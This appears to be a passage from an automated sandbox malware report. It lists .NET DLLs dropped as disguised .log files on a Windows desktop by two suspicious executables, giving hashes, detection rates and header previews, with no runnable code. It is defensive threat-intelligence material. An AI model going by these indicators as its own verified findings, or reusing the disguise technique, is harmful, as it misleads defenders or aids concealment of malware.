SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JmWFnalj.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KBRTYUOn.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KeYvlRxi.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KsQEGBOR.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\LLCKvMGi.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\LVVbmwlM.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\LieVinBD.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MEDBuDSi.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MXCVunwb.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\MitCbspL.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NNotRvLd.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\NZJkwJOG.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NZaMcRbY.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NlkveJFZ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OcccncZk.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PKGckfmR.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PSpuOONW.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PUjRdfFC.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PYUMpkBx.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PezePGqX.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QNHtupkd.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

